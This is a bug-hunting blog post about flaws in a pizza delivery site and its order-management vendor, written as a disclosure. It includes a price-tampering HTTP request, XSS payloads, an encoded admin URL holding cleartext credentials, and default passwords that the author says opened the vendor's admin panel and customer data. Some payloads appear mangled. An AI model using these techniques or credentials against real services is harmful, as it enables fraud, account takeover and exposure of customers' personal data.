I often order pizza in Odessa, I love pizza.od.ua delivery most of all, they don’t regret filling and you can create pizza from your ingredients, in other delivery services you can choose only the pizza that you are offered, you can not add more ingredients or choose other. About two months ago I got hooked on sushi on this delivery. Recently, sushi is temporarily not delivered, then I found another delivery of sushi and pizza.

I decided to ckeck this new delivery for vulnerabilities.

The first vulnerability — the most popular on such sites is the lack of verification of the payment amount for the goods (iDOR).

In post request there is a variable price, and finalPrice, the finalPrice variable is editable and you can make yourself a discount on pizza. Request: POST /pay.html HTTP/1.1
Host: www.pizza.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://yahoo.com/{{2+2}}
Content-Length: 262
Cookie:

streetId=&streetName=qwqwqw&persons=1&change=500&name=qw&phone=%2B38(111)1111111&email=mm%40mm.mm&t-ord=&comment=&promocode=&agreement=on&check-ord=online&order%5B0%5D%5Bid%5D=1162&order%5B0%5D%5Bamount%5D=2&order%5B0%5D%5Btype%5D=rollyi&price=210&finalPrice=30
We change the finalPrice and we paid for the pizza 30 hryvna instead of 210. The order was accepted, but the administrators noticed the substitution and refused to send me the pizza.

The second vulnerability. When the order has been sent, it is redirected to the page http://pizza.com/your_order.html?order=567808&ret=1, the order number is displayed on the page. Instead of the number, enter js http://pizza.com/your_order.html?order=">&ret=1 and get Reflected XSS vulnerability.

Third vulnerability is Logout csrf and clickjacking Disclosure information and administration panel takeover with orders.

It turned out that when we ordered food, it was not yet added to the admin panel for review. To add a custom site creates at http://pizza.com/your_order.html?order=567808&ret=1 iframe page with address: http://pizza.com/your_order.html?order=567808&curl1=aHR0cDovL29ubGluZS5tb2JpZGVsLnJ1L21ha2VPcmRlci5waHA/dXNlcj1yb290JnBhc3N3b3JkPXBhc3dvcmQmd2lkPTQwNTAmZmFtaWx5PSUyMiUzRSUzQ2ltZytzcmMlM0R4K29uZXJyb3IlM0Rwcm9tcHQlMjgxJTI5JTNFK3F3JTdCJTdCMisyJTdEJTdEcXcmc3RyZWV0PTElMkMxJTIyJTNFJTNDaW1nK3NyYyUzRHgrb25lcnJvciUzRHByb21wdCUyODElMjklM0UrcXclN0IlN0IyKzIlN0QlN0RxdyZob21lPSZyb29tPSZlbnRyYW5jZT0mZmxvb3I9JnBob25lPTM4MDYzNjgxOTQ2NCZjb21tZW50PSVEMCU5RSVEMCVCRiVEMCVCQiVEMCVCMCVEMSU4NyVEMCVCNSVEMCVCRCslRDAlQkUlRDAlQkQlRDAlQkIlRDAlQjAlRDAlQjklRDAlQkQlMjErJTNDYnIlM0UlRDAlOUQlRDAlQjArJUQwJUIyJUQxJTgwJUQwJUI1JUQwJUJDJUQxJThGJTNBJTIyJTNFJTNDaW1nK3NyYyUzRHgrb25lcnJvciUzRHByb21wdCUyODElMjklM0UrcXclN0IlN0IyKzIlN0QlN0RxdyslRDAlOUYlRDElODAlRDAlQkUlRDAlQkMlRDAlQkUtJUQwJUJBJUQwJUJFJUQwJUI0KyUyMiUzRSUzQ2ltZytzcmMlM0R4K29uZXJyb3IlM0Rwcm9tcHQlMjgxJTI5JTNF K3F3JTdCJTdCMisyJTdEJTdEcXclRDAlOUElRDAlQkUlRDAlQkIlRDAlQjglRDElODclRDAlQjUlRDElODElRDElODIlRDAlQjIlRDAlQkUrJUQwJUJGJUQwJUI1JUQxJTgwJUQxJTgxJUQwJUJFJUQwJUJEKy0rMSslRDAlOUYlRDAlQkUlRDAlQjQlRDAlQjMlRDAlQkUlRDElODIlRDAlQkUlRDAlQjIlRDAlQjglRDElODIlRDElOEMrJUQxJTgxJUQwJUI0JUQwJUIwJUQxJTg3JUQxJTgzKyVEMSU4MSsrJUQwJTlBJUQwJUJFJUQwJUJDJUQwJUJDJUQwJUI1JUQwJUJEJUQxJTgyJUQwJUIwJUQxJTgwJUQwJUI4JUQwJUI5KyVEMCVCRiVEMCVCRSVEMCVCQiVEMSU4QyVEMCVCNyVEMCVCRSVEMCVCMiVEMCVCMCVEMSU4MiVEMCVCNSVEMCVCQiVEMSU4RiUyMiUzRSUzQ2ltZytzcmMlM0R4K29uZXJyb3IlM0Rwcm9tcHQlMjgxJTI5JTNFK3F3JTdCJTdCMisyJTdEJTdEcXcmYXJ0aWNsZXMlNUIwJTVEPTA1ODkmYXJ0aWNsZXMlNUIxJTVEPTEyMDkmbm9uQ2FzaD0xJnF1YW50aXRpZXMlNUIwJTVEPTQmcXVhbnRpdGllcyU1QjElNUQ9MQ ==

curl1 is the address of the site that loads in the frame, looks like base64, we can decode it, it turns out http://online.mobidel.ru/makeOrder.php?user=root&password=password&wid=5040&family=dataнашегоwid id of the website, trying to enter the admin panel at http://online.mobidel.ru/ and we did it. We look at our order, it can be edited, sent for processing on behalf of the dispatcher and got a free pizza (I certainly will not do this).

We can also view all customer data and current orders.

I inform the pizza delivery service about this vulnerability, and get 10 any free pizzas or sushi.

Timeline:

29 january. Reported a vulnerability.

January 30. Awarded a reward of 20 free pizzas or sushi with a 50% discount (10 free pizzas).

February 19th Vulnerability fixed.

We now going to mobidel.ru. The order was created in a get request with a login and password in clear text http://pizza.com/your_order.html?order=567808&curl1=hash. There is a possibility that the same vulnerability exists in other clients. We look at the page with clients, from there we collect urls of their websites. Checked, it turned out that it was the only case where the username and password are in the clear.
Moving on.

1) Discovering Stored XSS

If you send a script through the order: ">
«>,
Then we get cookies of dispatcher and will hack admin panel with orders of any site where this script will be executed. Vulnerable fields: Home, time, promotional code, comment.

2) Finding the vulnerability Bruteforce & Account Takeover

When we are registering, we receive a message about the activation of the test period of 30 days with our login information:

  • ID of the website: 5687
  • Username: disp5687
  • Password: 123456

I logged into my account and could not immediately find where I can change my password. Probably the other users too. So it is - almost every ID has a password of 123456. About 2.5 thousand users have a default password (those who activated 30 days for free and some accounts of those who are on a permanent basis). A lot of email addresses, phone numbers and initials are disclosed.

If for the dispatcher’s office there was a default password 123456, then about the courier’s office they did not bother:

  • ID of the website: 5687
  • Username: 5687
  • Password: 5687

Seems like they did not care about security.

29 january — I send 2 messages on finding of vulnerability, 28 february — another one message, 1 march - three more letters, the company still ignores my messages. March 1, I contacted the head of the pizza delivery service, he dropped the link to the programmer's contact (social network) that works in mobidel. I wrote to him about the vulnerability, he said "Please, write to the same email address, this time you will not be ignored."

Company responce:

Hello!
We would not call it a vulnerability, and your actions are quite logical, the password
123456 standard for all those who use the system on an ongoing basis
will change it.

My answer:

Those who use the system on an ongoing basis will change it. And those who do not use, you do not care about the fact that their personal data will be stolen?

My message was still ignored, and my another message:

Do not ignore this vulnerability, ignoring is not a solution.

  • send a xss vulnerability report with the capture of any delivery service.

We give the company 20 days in order to fix all these vulnerabilities or at least respond to my messages. This doesn’t happen , I share it in my blog post.

As a bonus, here is such a feature for pentesters: when you need to test a vulnerability on a site on two accounts, and your mail is in Yandex, then you can register one account for two mail (mail@yandex.ru; mail@ya.ru).

Conclusion from this article: Do not set default passwords on accounts, you need to generate only complex passwords, with upper, lower case, numbers and symbols.

Memes for this topic (sorry, it's on russian only meme):

image

Thanks

for the reading!

I hope this article will be a lesson for them and they will close all their vulnerabilities.

Previous article [BUGHUNTING] BLIND XSS VULNERABILITY ON THE SITES OF OMNIDESK Support Service.

You can order information security audit here .

en_USEnglish
ru_RURussian en_USEnglish